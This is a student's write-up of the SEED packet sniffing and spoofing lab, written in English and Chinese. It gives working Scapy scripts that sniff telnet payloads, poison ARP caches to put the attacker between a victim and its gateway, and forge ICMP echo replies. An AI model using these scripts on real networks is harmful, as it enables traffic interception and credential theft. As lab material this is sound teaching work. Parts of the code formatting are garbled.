SEEDLAB_Packet Sniffing and Spoofing Lab
- Capture only the ICMP packet
#-*-coding:utf-8-*- from scapy.all import *
def print_pkt(pkt):
pkt.show()
pkt = sniff(iface=”ens33”,filter=”icmp”,prn=print_pkt)
* Capture any TCP packet that comes from a particular IP and with a destination port number 23
```python
#-*-coding:utf-8-*-
from scapy.all import *
def print_pkt(pkt):
pkt.show()
pkt = sniff(iface="ens33",filter="tcp net 192.168.209.131 and tcp dst port 23",prn=print_pkt)
- Capture packets comes from or to go to a particular subnet. You can pick any subnet, such as 128.230.0.0/16; you should not pick the subnet that your VM is attached to.
#-*-coding:utf-8-*- from scapy.all import *
def print_pkt(pkt):
pkt.show()
pkt = sniff(iface=”ens33”,filter=”net 192.168.202”,prn=print_pkt)
* send a packet
```python
-*-coding:utf-8-*-
from scapy.all import *
a = IP()
a.dst = '192.168.202.1'
a.ttl = 3
b = ICMP()
p = a/b
send(p)
ls(a)
- Sniffing telnet
#-*-coding:utf-8-*- from scapy.all import *
def print_pkt(pkt):
raw = pkt.sprintf(“%Raw.load%”)
print raw
pkt = sniff(iface=”ens33”,filter=”tcp”,prn=print_pkt)
* Sniffing and-then Spoofing
```python
#响应arp报文
#-*-coding:utf-8-*-
from scapy.all import *
def init_arp():
ether = Ether()
ether.dst = "ff:ff:ff:ff:ff:ff"
ether.src = "00:0c:29:e1:95:00"
arp = ARP()
arp.psrc = '192.168.20.1'
arp.hwsrc = '00:0c:29:e1:95:00'
arp.pdst = '192.168.20.1'
arp.hwdst = 'ff:ff:ff:ff:ff:ff'
arp.op = 1
p = ether/arp
for i in range(3):
sendp(p)
def sniff_spool_arp(pkt):
if pkt[0][Ether].dst == "ff:ff:ff:ff:ff:ff":
a = ARP()
a.pdst = pkt[0][ARP].psrc
a.hwsrc = "00:0c:29:e1:95:00" #虚拟机mac地址
a.psrc = pkt[0][ARP].pdst
a.hwdst = pkt[0][ARP].hwsrc
a.op = 2 #opcode为2表示响应
for i in range(3):
send(a)
init_arp()
pkt = sniff(iface="ens33",filter="arp",prn=sniff_spool_arp,store=0)
- 改进版arp欺骗
#-*-coding:utf-8-*-
from scapy.all import *
import sys
#-*-
def attack_host():
ether = Ether()
ether.dst = host_mac
ether.src = attacker_mac #attacker’s mac
arp = ARP()
arp.psrc = gw_ip
arp.hwsrc = attacker_mac
arp.pdst = host
arp.hwdst = host_mac
arp.op = 1
p = ether/arp
for i in range(3):
sendp(p)
def attack_gw():
ether = Ether()
ether.dst = gw_mac
ether.src = attacker_mac
arp = ARP()
arp.psrc = host
arp.hwsrc = attacker_mac
arp.pdst = gw_ip
arp.hwdst = gw_mac
arp.op = 1
p = ether/arp
for i in range(3):
sendp(p)
def sniff_spool_arp(pkt):
a = ARP()
a.pdst = pkt[ARP].psrc
a.hwsrc = attacker_mac #attacker’s mac
a.psrc = pkt[ARP].pdst
a.hwdst = pkt[ARP].hwsrc
a.op = 2 #opcode为2表示响应
for i in range(3):
send(a)
if name == ‘main‘:
gw_ip = sys.argv[1]
gw_mac = getmacbyip(gw_ip)
host = sys.argv[2]
host_mac = getmacbyip(host)
iface = get_working_if()
attacker_mac = get_if_hwaddr(iface)
attack_host()
attack_gw()
pkt_filter = "arp net "+host+" or arp net "+gw_ip
pkt = sniff(iface="ens33",filter=pkt_filter,prn=sniff_spool_arp,store=0)
```python
#-*-coding:utf-8-*-
#响应icmp报文
from scapy.all import *
def send_icmp(pkt):
a = IP()
a.dst = pkt[0][IP].src
a.src = pkt[0][IP].dst
b = ICMP()
b.id = pkt[0][ICMP].id
b.seq = pkt[0][ICMP].seq
b.type = 0
b.code = 0
c = Raw()
c.load = pkt[0][Raw].load
p = a/b/c
send(p)
pkt = sniff(iface="ens33",filter="icmp",prn=send_icmp)
- 改进版icmp欺骗
#-*-coding:utf-8-*- #响应icmp报文 from scapy.all import *
iface = get_working_if()
attacker_mac = get_if_hwaddr(iface)
def send_icmp(pkt):
if pkt[0][Ether].src != attacker_mac:
a = IP()
a.dst = pkt[0][IP].src
a.src = pkt[0][IP].dst
b = ICMP()
b.id = pkt[0][ICMP].id
b.seq = pkt[0][ICMP].seq
b.type = 0
b.code = 0
c = Raw()
c.load = pkt[0][Raw]
p = a/b/c
send(p)
pkt = sniff(iface=”ens33”,filter=”icmp”,prn=send_icmp,store=0)
* 受害机添加网关
`sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.20.1`
* 验证
攻击机先后run sniff_spoof_arp脚本和sniff_spoof_icmp脚本
![](https://raw.githubusercontent.com/Danie1233/img/master/run.png)
然后
受害主机ping一个不存活的地址,会收到响应,欺骗成功
![](https://raw.githubusercontent.com/Danie1233/img/master/pingisok.png)